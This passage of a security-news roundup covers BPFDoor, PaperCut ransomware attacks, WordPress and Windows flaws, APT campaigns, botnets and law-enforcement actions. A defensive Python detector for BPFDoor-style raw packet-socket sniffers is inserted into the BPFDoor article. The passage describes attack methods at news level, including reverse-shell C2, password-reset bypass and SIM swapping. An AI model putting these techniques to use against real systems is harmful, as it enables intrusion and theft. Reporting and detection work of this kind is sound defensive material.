Deep Instinct's findings come from a BPFDoor artifact that was uploaded to VirusTotal on February 8, 2023. As of writing, only three security vendors have flagged the ELF binary as malicious.

One of the key characteristics that make the new version of BPFDoor even more evasive is its removal of many hard-coded indicators and instead incorporating a static library for encryption (libtomcrypt) and a reverse shell for command-and-control (C2) communication.

Upon launch, BPFDoor is configured to ignore various operating system signals to prevent it from being terminated. It then allocates a memory buffer and creates a special packet sniffing socket that monitors for incoming traffic with a specific Magic Byte sequence by hooking a BPF filter onto the raw socket.

"When BPFdoor finds a packet containing its Magic Bytes in the filtered traffic, it will treat it as a message from its operator and will parse out two fields and will again fork itself," the researchers explained.

"The parent process will continue and monitor the filtered traffic coming through the socket while the child will treat the previously parsed fields as a command-and-control IP-Port combination and will attempt to contact it."

In the final stage, BPFDoor sets up an encrypted reverse shell session with the C2 server and awaits further instructions to be executed on the compromised machine.
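A defender-side way to hunt for the sniffing socket described above on a Linux host, as an added example that is not from the Deep Instinct report or the BPFDoor sample: BPFDoor needs a raw AF_PACKET socket that sees every frame (ETH_P_ALL), so processes holding such a socket that are not a known sniffer are worth examining. The parsers take text so they can run on the constructed sample below; the process names, PIDs and inode numbers in that sample are constructed, and the live_scan() wrapper assumes the standard /proc layout.

```python
"""Hunt for processes holding raw, catch-all AF_PACKET sockets (BPFDoor-style sniffers)."""
import os
import re
from dataclasses import dataclass

SOCK_RAW = 3          # socket Type column: 3 == SOCK_RAW (full frames), 2 == SOCK_DGRAM
ETH_P_ALL = 0x0003    # Proto column is the hex ethertype; 0x0003 == every protocol
# Processes expected to hold packet sockets on a typical host (tune per environment).
KNOWN_SNIFFERS = {"tcpdump", "dhclient", "dhcpcd", "NetworkManager", "wpa_supplicant"}


@dataclass
class PacketSocket:
    inode: int
    sock_type: int
    proto: int
    iface: int


def parse_proc_net_packet(text):
    """Parse /proc/net/packet: a header line, then one socket per line with 9 columns."""
    sockets = []
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 9:
            continue  # malformed or blank line
        sockets.append(PacketSocket(inode=int(cols[8]), sock_type=int(cols[2]),
                                    proto=int(cols[3], 16), iface=int(cols[4])))
    return sockets


def suspicious(sockets):
    """Keep only raw sockets bound to ETH_P_ALL, which is what a passive sniffing backdoor needs."""
    return [s for s in sockets if s.sock_type == SOCK_RAW and s.proto == ETH_P_ALL]


_SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


def map_inodes_to_pids(fd_links):
    """fd_links: pid -> list of readlink() targets of /proc/<pid>/fd/*. Returns inode -> [pid]."""
    owners = {}
    for pid, targets in fd_links.items():
        for target in targets:
            m = _SOCKET_RE.match(target)
            if m:
                owners.setdefault(int(m.group(1)), []).append(pid)
    return owners


def find_unexpected_sniffers(packet_table, fd_links, comm_by_pid):
    """Return [(pid, comm, inode)] for raw ETH_P_ALL sockets held by non-allowlisted processes."""
    owners = map_inodes_to_pids(fd_links)
    hits = []
    for sock in suspicious(parse_proc_net_packet(packet_table)):
        for pid in owners.get(sock.inode, []):
            comm = comm_by_pid.get(pid, "?")
            if comm not in KNOWN_SNIFFERS:
                hits.append((pid, comm, sock.inode))
    return hits


def live_scan():
    """Read the real /proc (Linux only; run as root to see other users' file descriptors)."""
    with open("/proc/net/packet") as f:
        table = f.read()
    fd_links, comms = {}, {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comms[pid] = f.read().strip()
            fd_dir = f"/proc/{pid}/fd"
            fd_links[pid] = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:
            continue  # process exited, or not permitted to read its fds
    return find_unexpected_sniffers(table, fd_links, comms)


# Constructed sample: two raw ETH_P_ALL sockets (one held by tcpdump, one by an unknown
# process) and one ordinary DGRAM/IPv4 packet socket held by dhclient.
SAMPLE_PACKET_TABLE = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
0000000000000000 3      3    0003   2     1 0        0      30001
0000000000000000 3      3    0003   2     1 0        0      30002
0000000000000000 3      2    0800   2     1 0        0      30003
"""
SAMPLE_FD_LINKS = {
    1200: ["/dev/null", "socket:[30001]"],
    4242: ["/dev/null", "pipe:[77]", "socket:[30002]"],
    500: ["socket:[30003]"],
}
SAMPLE_COMMS = {1200: "tcpdump", 4242: "svc-helper", 500: "dhclient"}  # constructed names

if __name__ == "__main__":
    for pid, comm, inode in find_unexpected_sniffers(SAMPLE_PACKET_TABLE, SAMPLE_FD_LINKS, SAMPLE_COMMS):
        print(f"pid {pid} ({comm}) holds a raw ETH_P_ALL packet socket (inode {inode})")
```

A hit only says a process is sniffing every frame; confirm by checking the attached filter and the binary itself before acting on it.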

The fact that BPFDoor has remained hidden for so long speaks to its sophistication, at a time when threat actors are increasingly developing malware targeting Linux systems owing to their prevalence in enterprise and cloud environments.

The development comes as Google announced a new extended Berkeley Packet Filter (eBPF) fuzzing framework called Buzzer to help harden the Linux kernel and ensure that sandboxed programs that run in a privileged context are valid and safe.

The tech giant further said the testing method led to the discovery of a security flaw (CVE-2023-2163) that could be exploited to achieve arbitrary reading and writing of kernel memory.


Bl00dy Ransomware Gang Strikes Education Sector with Critical PaperCut Vulnerability
13.5.23  Ransomware  The Hacker News
U.S. cybersecurity and intelligence agencies have warned of attacks carried out by a threat actor known as the Bl00dy Ransomware Gang that attempt to exploit vulnerable PaperCut servers against the education facilities sector in the country.

The attacks took place in early May 2023, the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) said in a joint cybersecurity advisory issued Thursday.

"The Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet," the agencies said.

"Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files."

Additionally, the Bl00dy actors are said to have used TOR and other proxies from within victim networks for external communications in an attempt to mask malicious traffic and avoid detection.

CVE-2023-27350 is a now-patched critical security flaw affecting some versions of PaperCut MF and NG that enables a remote actor to bypass authentication and conduct remote code execution on the following affected installations: 8.0.0 to 19.2.7, 20.0.0 to 20.1.6, 21.0.0 to 21.2.10, and 22.0.0 to 22.0.8.

Malicious exploitation of the vulnerability has been observed since mid-April 2023, with attacks primarily weaponizing it to deploy legitimate remote management and maintenance (RMM) software and use the tool to drop additional payloads such as Cobalt Strike Beacons, DiceLoader, and TrueBot on compromised systems.

The disclosure comes as cybersecurity firm eSentire unearthed new activity targeting an unnamed education sector customer that involved the exploitation of CVE-2023-27350 to drop an XMRig cryptocurrency miner.

Attacks against PaperCut print management servers have also been deployed by Iranian state-sponsored threat groups Mango Sandstorm (aka MuddyWater or Mercury) and Mint Sandstorm (aka Phosphorus), Microsoft revealed last week.


Severe Security Flaw Exposes Over a Million WordPress Sites to Hijack
12.5.23  Vulnerability  The Hacker News
A security vulnerability has been disclosed in the popular WordPress plugin Essential Addons for Elementor that could be potentially exploited to achieve elevated privileges on affected sites.

The issue, tracked as CVE-2023-32243, has been addressed by the plugin maintainers in version 5.7.2 that was shipped on May 11, 2023. Essential Addons for Elementor has over one million active installations.

"This plugin suffers from an unauthenticated privilege escalation vulnerability and allows any unauthenticated user to escalate their privilege to that of any user on the WordPress site," Patchstack researcher Rafie Muhammad said.

Successful exploitation of the flaw could permit a threat actor to reset the password of any arbitrary user as long as the malicious party is aware of their username. The shortcoming is believed to have existed since version 5.4.0.

This can have serious ramifications as the flaw could be weaponized to reset the password associated with an administrator account and seize full control of the website.

"This vulnerability occurs because this password reset function does not validate a password reset key and instead directly changes the password of the given user," Muhammad pointed out.

The disclosure comes more than a year after Patchstack revealed another severe flaw in the same plugin that could have been abused to execute arbitrary code on compromised websites.

The findings also follow the discovery of a new wave of attacks targeting WordPress sites since late March 2023 that aims to inject the infamous SocGholish (aka FakeUpdates) malware.

SocGholish is a persistent JavaScript malware framework that functions as an initial access provider to facilitate the delivery of additional malware to infected hosts. The malware has been distributed via drive-by downloads masquerading as a web browser update.

The latest campaign detected by Sucuri has been found to leverage compression techniques using a software library called zlib to conceal the malware, reduce its footprint, and avoid detection.

"Bad actors are continually evolving their tactics, techniques, and procedures to evade detection and prolong the life of their malware campaigns," Sucuri researcher Denis Sinegubko said.

"SocGholish malware is a prime example of this, as attackers have altered their approach in the past to inject malicious scripts into compromised WordPress websites."

It's not just SocGholish. Malwarebytes, in a technical report this week, detailed a malvertising campaign that serves visitors to adult websites with popunder ads that simulate a fake Windows update to drop the "in2al5d p3in4er" (aka Invalid Printer) loader.

"The scheme is very well designed as it relies on the web browser to display a full screen animation that very much resembles what you'd expect from Microsoft," Jérôme Segura, director of threat intelligence at Malwarebytes, said.

The loader, which was documented by Morphisec last month, is designed to check the system's graphic card to determine if it's running on a virtual machine or in a sandbox environment, and ultimately launch the Aurora information stealer malware.

The campaign, per Malwarebytes, has claimed 585 victims over the past two months, with the threat actor also linked to other tech support scams and an Amadey bot command-and-control panel.


New APT Group Red Stinger Targets Military and Critical Infrastructure in Eastern Europe
12.5.23  APT  The Hacker News
A previously undetected advanced persistent threat (APT) actor dubbed Red Stinger has been linked to attacks targeting Eastern Europe since 2020.

"Military, transportation, and critical infrastructure were some of the entities being targeted, as well as some involved in the September East Ukraine referendums," Malwarebytes disclosed in a report published today.

"Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings."

Red Stinger overlaps with a threat cluster Kaspersky revealed under the name Bad Magic last month as having targeted government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea last year.

While there were indications that the APT group may have been active since at least September 2021, the latest findings from Malwarebytes push the group's origins back by nearly a year, with the first operation taking place in December 2020.

The attack chain, over the years, has leveraged malicious installer files to drop the DBoxShell (aka PowerMagic) implant on compromised systems. The MSI file, for its part, is downloaded by means of a Windows shortcut file contained within a ZIP archive.

Subsequent waves detected in April and September 2021 have been observed to leverage similar attack sequences, albeit with minor variations in the MSI file names.

A fourth set of attacks coincided with the onset of Russia's military invasion of Ukraine in February 2022. The last known activity associated with Red Stinger took place in September 2022, as documented by Kaspersky.

"DBoxShell is malware that utilizes cloud storage services as a command-and-control (C&C) mechanism," security researchers Roberto Santos and Hossein Jazi said.

"This stage serves as an entry point for the attackers, enabling them to assess whether the targets are interesting or not, meaning that in this phase they will use different tools."

The fifth operation is also notable for delivering an alternative to DBoxShell called GraphShell, which is so named for its use of the Microsoft Graph API for C&C purposes.

The initial infection phase is followed by the threat actor deploying additional artifacts like ngrok, rsockstun (a reverse tunneling utility), and a binary to exfiltrate victim data to an actor-controlled Dropbox account.

The exact scale of the infections is unclear, although evidence points to two victims located in central Ukraine – a military target and an officer working in critical infrastructure – who were compromised as part of the February 2022 attacks.

In both instances, the threat actors exfiltrated screenshots, microphone recordings, and office documents after a period of reconnaissance. One of the victims also had their keystrokes logged and uploaded.

The September 2022 intrusion set, on the other hand, is significant for the fact that it chiefly singled out Russia-aligned regions, including officers and individuals involved in elections. One of the surveillance targets had data from their USB drives exfiltrated.

Malwarebytes said it also identified a library in the Ukrainian city of Vinnytsia that was infected as part of the same campaign, making it the only Ukraine-related entity to be targeted. The motivations are presently unknown.

While the origins of the threat group are a mystery, it has emerged that the threat actors managed to infect their own Windows 10 machines at some point in December 2022, either accidentally or for testing purposes (given the name TstUser), offering an insight into their modus operandi.

Two things stand out: the choice of English as the default language and the use of the Fahrenheit temperature scale to display the weather, likely suggesting the involvement of native English speakers.

"In this case, attributing the attack to a specific country is not an easy task," the researchers said. "Any of the involved countries or aligned groups could be responsible, as some victims were aligned with Russia, and others were aligned with Ukraine."

"What is clear is that the principal motive of the attack was surveillance and data gathering. The attackers used different layers of protection, had an extensive toolset for their victims, and the attack was clearly targeted at specific entities."


Spanish Police Takes Down Massive Cybercrime Ring, 40 Arrested
12.5.23  Crime  The Hacker News
The National Police of Spain said it arrested 40 individuals for their alleged involvement in an organized crime gang called Trinitarians.

Among those apprehended are two hackers who carried out bank scams through phishing and smishing techniques and 15 other members of the crime syndicate, all of whom have been charged with a number of offenses such as bank fraud, forging documents, identity theft, and money laundering.

In all, the nefarious scheme is believed to have defrauded more than 300,000 victims, resulting in losses of over €700,000.

"The criminal organization used hacking tools and business logistics to carry out computer scams," officials said.

To pull off the attacks, the cybercriminals sent bogus links via SMS that, when clicked, redirected users to a phishing panel masquerading as legitimate financial institutions to steal their credentials and abuse that access to request loans and link the cards to cryptocurrency wallets under their control.

These SMS messages sought to induce a false sense of urgency and increase the actors' chance of success by urging the recipients to click on the accompanying link in order to resolve a purported security issue with their bank accounts.

The stolen cards were used to purchase digital assets, which were then cashed out to fund the group's operations, such as paying legal fees, sending money to members in prison, and the purchase of narcotics and weapons.

Some of the illicit proceeds were also sent to foreign bank accounts, from where other group members used the money to purchase real estate in the Dominican Republic.

"They also had an extensive network of mules that they used to receive money from bank transfers and withdraw it through ATMs," the National Police said.

Another scam perpetrated by the outfit entailed contracting point-of-sale (PoS) terminals by setting up front companies to make false purchases.

Authorities said 13 house searches were carried out in the provinces of Madrid, Seville, and Guadalajara, leading to the confiscation of computer equipment, padlocks, €5,000 in cash, lock-picking toolkits, and other documents containing information about the gang's organizational structure.


Babuk Source Code Sparks 9 Different Ransomware Strains Targeting VMware ESXi Systems
12.5.23  Ransomware  The Hacker News

Multiple threat actors have capitalized on the leak of Babuk (aka Babak or Babyk) ransomware code in September 2021 to build as many as nine different ransomware families capable of targeting VMware ESXi systems.

"These variants emerged through H2 2022 and H1 2023, which shows an increasing trend of Babuk source code adoption," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.

"Leaked source code enables actors to target Linux systems when they may otherwise lack expertise to build a working program."

A number of cybercrime groups, both big and small, have set their sights on ESXi hypervisors. What's more, at least three different ransomware strains – Cylance, Rorschach (aka BabLock), and RTM Locker – that have emerged since the start of the year are based on the leaked Babuk source code.

SentinelOne's latest analysis shows that this phenomenon is more common, with the cybersecurity company identifying source code overlaps between Babuk and ESXi lockers attributed to Conti and REvil (aka REvix).

Other ransomware families that have ported various features from Babuk into their respective code include LOCK4, DATAF, Mario, Play, and Babuk 2023 (aka XVGV) ransomware.

Despite this noticeable trend, SentinelOne said it observed no parallels between Babuk and ALPHV, Black Basta, Hive, and LockBit's ESXi lockers, adding it found "little similarity" between ESXiArgs and Babuk, indicating an erroneous attribution.

"Based on the popularity of Babuk's ESXi locker code, actors may also turn to the group's Go-based NAS locker," Delamotte said. "Golang remains a niche choice for many actors, but it continues to increase in popularity."

The development comes as threat actors associated with Royal ransomware, who are suspected to be former Conti members, have expanded their attack toolkit with an ELF variant that's capable of striking Linux and ESXi environments.

"The ELF variant is quite similar to the Windows variant, and the sample does not contain any obfuscation," Palo Alto Networks Unit 42 said in a write-up published this week. "All strings, including the RSA public key and ransom note, are stored as plaintext."

Royal ransomware attacks are facilitated by means of various initial access vectors such as callback phishing, BATLOADER infections, or compromised credentials, which are then abused to drop a Cobalt Strike Beacon as a precursor to ransomware execution.

Since bursting on the scene in September 2022, Royal ransomware has claimed responsibility for targeting 157 organizations on their leak site, with most of the attacks targeting manufacturing, retail, legal services, education, construction, and healthcare services in the U.S., Canada, and Germany.


Andoryu Botnet Exploits Critical Ruckus Wireless Flaw for Widespread Attack
12.5.23  BotNet  The Hacker News
A nascent botnet called Andoryu has been found to exploit a now-patched critical security flaw in the Ruckus Wireless Admin panel to break into vulnerable devices.

The flaw, tracked as CVE-2023-25717 (CVSS score: 9.8), stems from improper handling of HTTP requests, leading to unauthenticated remote code execution and a complete compromise of wireless Access Point (AP) equipment.

Andoryu was first documented by Chinese cybersecurity firm QiAnXin earlier this February, detailing its ability to communicate with command-and-control (C2) servers using the SOCKS5 protocol.

While the malware is known to weaponize remote code execution flaws in GitLab (CVE-2021-22205) and Lilin DVR for propagation, the addition of CVE-2023-25717 shows that Andoryu is actively expanding its exploit arsenal to ensnare more devices into the botnet.

"It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies," Fortinet FortiGuard Labs researcher Cara Lin said, adding the latest campaign commenced in late April 2023.

Further analysis of the attack chain has revealed that once the Ruckus flaw is used to gain access to a device, a script from a remote server is dropped onto the infected device for proliferation.

The malware, for its part, also establishes contact with a C2 server and awaits further instructions to launch a DDoS attack against targets of interest using protocols like ICMP, TCP, and UDP.

The cost associated with mounting such attacks is advertised via a listing on the seller's Telegram channel, with monthly plans ranging from $90 to $115 depending on the duration.

RapperBot Botnet Adds Crypto Mining to its List of Capabilities
The alert follows the discovery of new versions of the RapperBot DDoS botnet that incorporate cryptojacking functionality to profit off compromised Intel x64 systems by dropping a Monero crypto miner.

RapperBot campaigns have primarily focused on brute-forcing IoT devices with weak or default SSH or Telnet credentials to expand the botnet's footprint for launching DDoS attacks.

Fortinet said it detected the latest iteration of the RapperBot miner activity in January 2023, with the attacks delivering a Bash shell script that, in turn, is capable of downloading and executing separate XMRig crypto miners and RapperBot binaries.

Subsequent updates to the malware have merged the two disparate functions into a single bot client with mining capabilities, while also taking steps to terminate competing miner processes.

Interestingly, none of the new RapperBot samples with the integrated XMRig miner incorporate self-propagation capabilities, raising the possibility of an alternate distribution mechanism.

"This suggests the possible availability of an external loader operated by the threat actor that abuses the credentials collected by other RapperBot samples with brute forcing capabilities and infects only x64 machines with the combined bot/miner," Fortinet theorized.

RapperBot's expansion to cryptojacking is yet another indication that financially motivated threat operators leave no stone unturned to "extract the maximum value from machines infected by their botnets."

The twin developments also come as the U.S. Justice Department announced the seizure of 13 internet domains associated with DDoS-for-hire services.


Twitter Finally Rolling Out Encrypted Direct Messages — Starting with Verified Users
12.5.23  Social  The Hacker News
Twitter is officially beginning to roll out support for encrypted direct messages (DMs) on the platform, more than five months after its chief executive Elon Musk confirmed plans for the feature in November 2022.

The "Phase 1" of the initiative will appear as separate conversations alongside existing direct messages on users' inboxes. Encrypted chats carry a lock icon badge to visually differentiate them.

That said, the opt-in feature is currently limited to verified users or affiliates of a verified organization. It's also essential that both the sender and recipient are on the latest versions of the Twitter apps across Android, iOS, and desktop web.

Another criterion for sending and receiving encrypted messages is that the recipient must follow the sender, have sent a message to the sender in the past, or have accepted a direct message request from the sender at some point.

While Twitter did not disclose the exact method it uses to secure the conversations, the company said it employs a "combination of strong cryptographic schemes" to encrypt users' messages, links, and reactions.

It further emphasized that the encrypted chat contents remain encrypted while stored on its infrastructure and only decrypted at the receiver's end. The implementation is expected to be open sourced later this year.

That said, the work-in-progress nature of the project also means that it does not support encrypted group conversations or allow exchanging media and other file attachments. Some other notable restrictions are as follows -

Users can only register a maximum of up to 10 devices to send and receive encrypted messages.
New devices (where the Twitter app is re-installed) cannot partake in existing encrypted conversations
Logging out from Twitter will cause all messages, including encrypted DMs, to be deleted from the current device
It also said the current architecture does not "offer protections against man-in-the-middle attacks" and that it does not guarantee forward secrecy, a crucial security measure that ensures that a compromise of a single session key will not impact data shared in other sessions.

"If the private key of a registered device was compromised, an attacker would be able to decrypt all of the encrypted messages that were sent and received by that device," Twitter said, adding it doesn't plan to remediate the limitation, keeping the larger user experience in mind.


GitHub Extends Push Protection to Prevent Accidental Leaks of Keys and Other Secrets
12.5.23  Security  The Hacker News
GitHub has announced the general availability of a new security feature called push protection, which aims to prevent developers from inadvertently leaking keys and other secrets in their code.

The Microsoft-owned cloud-based repository hosting platform, which began testing the feature a year ago, said it's also extending push protection to all public repositories at no extra cost.

The functionality is designed to work hand-in-hand with the existing secret scanning feature, which scans repositories for known secret formats to prevent their fraudulent use and avert potentially serious consequences.

"Push protection prevents secret leaks without compromising the developer experience by scanning for highly identifiable secrets before they are committed," GitHub said earlier this week.

"When a secret is detected in code, developers are prompted directly in their IDE or command line interface with remediation guidance to ensure that the secret is never exposed."

While push protection can be bypassed by providing a reason (e.g., testing, false positive, or acceptable risk), repository and organization administrators and security managers will be notified of such events via email.

To enable the option, users can head to Settings > Select "Code security and analysis" > Enable "Secret scanning" and "Push protection."

Push protection, since it went live in April 2022 as a beta, is estimated to have prevented 17,000 accidental secret leaks, saving more than 95,000 hours that would have otherwise been spent revoking, rotating, and remediating the compromised secrets, the company added.

The development comes nearly five months after GitHub made secret scanning free for all public repositories, enabling users to be notified about leaked secrets in their repositories.


Google Announces New Privacy, Safety, and Security Features Across Its Services
12.5.23  Security  The Hacker News
Google unveiled a slew of new privacy, safety, and security features today at its annual developer conference, Google I/O. The tech giant's latest initiatives are aimed at protecting its users from cyber threats, including phishing attacks and malicious websites, while providing more control and transparency over their personal data.

Here is a short list of the newly introduced features -

Improved data control and transparency
Gmail Dark Web Scan Report
Effortlessly Delete Maps Search History
AI-Powered Safe Browsing
Content Safety API Expansion
About this Image
Spam View in Google Drive
Among the newly introduced features, the first on the list is improved data control and transparency. Google has unveiled an update for its Android operating system that allows users to better control location sharing through apps installed on their devices.

"Starting with location data, you will be informed in permission requests when an app shares your information with third-parties for advertising purposes," Jen Fitzpatrick, senior vice president of core systems and experiences, said.

"You can use this information to decide if you want to approve or decline location sharing for each app so you're always in control."

Android 14, besides providing granular control over the media that apps can access, brings with it a new API that allows developers to limit accessibility services from interacting with their applications and ensure that only Google Play Protect-validated applications have access to users' data.

"This adds more protection from side-loaded apps that may get installed and are trying to access sensitive data," Google's Ronnie Falcon said.

In addition, the company said it's expanding dark web reports to all users with a Gmail account in the U.S. to alert if their sensitive data is circulating on sites not indexed by search engines.

The feature, which was initially made available to Google One subscribers in March 2023, makes it possible to scan the dark web for personally identifiable information such as names, addresses, emails, phone numbers, and Social Security numbers, and seek appropriate guidance.

A third privacy-focused option launched by the tech giant is the ability to delete recent searches from Maps with a single tap as opposed to removing the Maps search history from Web & App Activity.

Other notable features include a new Safe Browsing API and a Spam view in Google Drive that's analogous to Gmail and automatically segregates potentially harmful files or abusive content, which can then be reviewed by users.

The upgrade to Safe Browsing entails a real-time API that alerts of fast-emerging low-reputation and malicious sites, thereby thwarting potential phishing attempts from threat actors who set up short-lived pages to sidestep blocklist-based checks.

The search behemoth further said it's expanding its Content Safety API to flag child sexual abuse material (CSAM) in video content, alongside debuting an "About This Image" tool that offers users more context to ensure reliable access to trustworthy information.

"'About this Image' provides you with important context like when an image or similar images were first indexed by Google, where it may have first appeared, and where else it's been seen online like a news, social or fact checking site," Fitzpatrick said.

The updates come a week after Google enabled passwordless sign-ins using passkeys across Google Accounts on all platforms.

Last month, the tech giant also enacted a new data deletion policy that requires app developers to offer a "readily discoverable option" to users from both within an app and outside of it.

(The story has been updated after publication to highlight additional privacy and security features introduced by Google in Android 14.)


Experts Detail New Zero-Click Windows Vulnerability for NTLM Credential Theft
12.5.23  Vulnerebility  The Hacker News
Cybersecurity researchers have shared details about a now-patched security flaw in Windows MSHTML platform that could be abused to bypass integrity protections on targeted machines.

The vulnerability, tracked as CVE-2023-29324 (CVSS score: 6.5), has been described as a security feature bypass. It was addressed by Microsoft as part of its Patch Tuesday updates for May 2023.

Akamai security researcher Ben Barnea, who discovered and reported the bug, noted that all Windows versions are affected, but pointed out that Microsoft Exchange servers with the March update omit the vulnerable feature.

"An unauthenticated attacker on the internet could use the vulnerability to coerce an Outlook client to connect to an attacker-controlled server," Barnea said in a report shared with The Hacker News.

"This results in NTLM credentials theft. It is a zero-click vulnerability, meaning it can be triggered with no user interaction."

It's also worth noting that CVE-2023-29324 is a bypass for a fix Microsoft put in place in March 2023 to resolve CVE-2023-23397, a critical privilege escalation flaw in Outlook that the company said has been exploited by Russian threat actors in attacks aimed at European entities since April 2022.

Akamai said the issue stems from complex handling of paths in Windows, thereby allowing a threat actor to craft a malicious URL that can sidestep internet security zone checks.

"This vulnerability is yet another example of patch scrutinizing leading to new vulnerabilities and bypasses," Barnea said. "It is a zero-click media parsing attack surface that could potentially contain critical memory corruption vulnerabilities."

In order to stay fully protected, Microsoft is further recommending users to install Internet Explorer Cumulative updates to address vulnerabilities in the MSHTML platform and scripting engine.


Sophisticated DownEx Malware Campaign Targeting Central Asian Governments
12.5.23  Virus  The Hacker News
Government organizations in Central Asia are the target of a sophisticated espionage campaign that leverages a previously undocumented strain of malware dubbed DownEx.

Bitdefender, in a report shared with The Hacker News, said the activity remains active, with evidence likely pointing to the involvement of Russia-based threat actors.

The Romanian cybersecurity firm said it first detected the malware in a highly targeted attack aimed at foreign government institutions in Kazakhstan in late 2022. Subsequently, another attack was observed in Afghanistan.

The use of a diplomat-themed lure document and the campaign's focus on data exfiltration suggests the involvement of a state-sponsored group, although the exact identity of the hacking outfit remains indeterminate at this stage.

The initial intrusion vector for the campaign is suspected to be a spear-phishing email bearing a booby-trapped payload, which is a loader executable that masquerades as a Microsoft Word file.

Opening the attachment leads to the extraction of two files, including a decoy document that's displayed to the victim while a malicious HTML application (.HTA) with embedded VBScript code runs in the background.

The HTA file, for its part, is designed to establish contact with a remote command-and-control (C2) server to retrieve a next-stage payload. While the exact nature of the malware is not known, it's said to be a backdoor used to establish persistence.

The attacks are also notable for employing a variety of custom tools for carrying out post-exploitation activities. This includes -

Two C/C++-based binaries (wnet.exe and utility.exe) to enumerate all the resources on a network,
A Python script (help.py) to establish an infinite communication loop with the C2 server and receive instructions to steal files with certain extensions, delete files created by other malware, and capture screenshots, and
A C++-based malware (diagsvc.exe aka DownEx) that's chiefly designed to exfiltrate files to the C2 server
Two other variants of DownEx have also been unearthed, the first of which executes an intermediate VBScript to harvest and transmit the files in the form of a ZIP archive.

The other version, which is downloaded via a VBE script (slmgr.vbe) from a remote server, eschews C++ for VBScript, but retains the same functionality as the former.

"This is a fileless attack – the DownEx script is executed in memory and never touches the disk," Bitdefender said. "This attack highlights the sophistication of a modern cyberattack. Cybercriminals are finding new methods for making their attacks more reliable."


Mastermind Behind Twitter 2020 Hack Pleads Guilty and Faces up to 70 Years in Prison
12.5.23  Social  The Hacker News
A U.K. national has pleaded guilty in the U.S. in connection with the July 2020 Twitter attack affecting numerous high-profile accounts and defrauding other users of the platform.

Joseph James O'Connor, who also went by the online alias PlugwalkJoe, admitted to "his role in cyberstalking and multiple schemes that involve computer hacking, including the July 2020 hack of Twitter," the U.S. Department of Justice (DoJ) said.

The 23-year-old individual was extradited from Spain on April 26 after the Spanish National Court, in February, approved the DoJ request to hand over O'Connor to face 14 criminal charges in the U.S.

The massive hack, which took place on July 15, 2020, involved O'Connor and his co-conspirators seizing control of 130 Twitter accounts, including those belonging to Barack Obama, Bill Gates, and Elon Musk, to perpetrate a cryptocurrency scam that netted them $120,000 in a few hours.

The attack was made possible by using social engineering techniques to obtain unauthorized access to backend tools used by Twitter, and subsequently leveraging that entry point to seize control of the accounts and, in some instances, sell the access to others. O'Connor himself is said to have purchased unauthorized access to one Twitter account for $10,000.

O'Connor is one of four individuals who have been charged with carrying out the Twitter hack. Nima Fazeli and Graham Ivan Clark were arrested that same month, while O'Connor was apprehended by Spanish authorities in the town of Estepona a year later in July 2021.

Mason Sheppard, according to BBC's Joe Tidy, has not been arrested, although the case against him is active. Clark was awarded a three-year jail term after he pleaded guilty to 30 felony charges in March 2021.

In addition to the Twitter incident, the defendant has been charged with computer intrusions related to takeovers of TikTok and Snapchat user accounts, as well as stalking a juvenile victim online.

This entailed orchestrating SIM swapping attacks against two unnamed victims to gain illicit access to their Snapchat and TikTok accounts, respectively, as well as making false emergency calls to law enforcement about a third victim, claiming that the party was "making threats to shoot people."

SIM swapping occurs when fraudsters contact a telecom service provider under the guise of a victim to port the target's mobile number to a SIM card under their control, resulting in the victim's calls and messages being routed to a malicious unauthorized device controlled by the threat actors.

The miscreants then typically use control of the victim's mobile phone number to take over bank accounts and other services held by the victim that are registered to the mobile phone number by taking advantage of call- or SMS-based two-factor authentication.

O'Connor and his co-conspirators have also been accused of employing SIM swapping techniques to siphon cryptocurrency to the tune of $794,000 from a New York City-based crypto company between March and May 2019.

"After stealing and fraudulently diverting the stolen cryptocurrency, O'Connor and his co-conspirators laundered it through dozens of transfers and transactions and exchanged some of it for Bitcoin using cryptocurrency exchange services," the DoJ said.

"Ultimately, a portion of the stolen cryptocurrency was deposited into a cryptocurrency exchange account controlled by O'Connor."

O'Connor, who has agreed to forfeit about $794,000 in stolen funds, is scheduled to be sentenced on June 23. The charges carry a total maximum penalty of over 70 years in prison.


U.S. Government Neutralizes Russia's Most Sophisticated Snake Cyber Espionage Tool
12.5.23  BigBrothers  The Hacker News

The U.S. government on Tuesday announced the court-authorized disruption of a global network compromised by an advanced malware strain known as Snake wielded by Russia's Federal Security Service (FSB).

Snake, dubbed the "most sophisticated cyber espionage tool," is the handiwork of a Russian state-sponsored group called Turla (aka Iron Hunter, Secret Blizzard, SUMMIT, Uroburos, Venomous Bear, and Waterbug), which the U.S. government attributes to a unit within Center 16 of the FSB.

The threat actor has a track record of heavily focusing on entities in Europe, the Commonwealth of Independent States (CIS), and countries affiliated with NATO, with recent activity expanding its footprint to incorporate Middle Eastern nations deemed a threat to countries supported by Russia in the region.

"For nearly 20 years, this unit [...] has used versions of the Snake malware to steal sensitive documents from hundreds of computer systems in at least 50 countries, which have belonged to North Atlantic Treaty Organization (NATO) member governments, journalists, and other targets of interest to the Russian Federation," the Justice Department said.

"After stealing these documents, Turla exfiltrated them through a covert network of unwitting Snake-compromised computers in the United States and around the world."

The neutralization was orchestrated as part of an effort dubbed Operation MEDUSA by means of a tool created by the U.S. Federal Bureau of Investigation (FBI) codenamed PERSEUS that permitted the authorities to issue commands to the malware that caused it to "overwrite its own vital components" on infected machines.

The self-destruct instructions, engineered after decrypting and decoding the malware's network communications, caused the "Snake implant to disable itself without affecting the host computer or legitimate applications on the computer," the agency said.

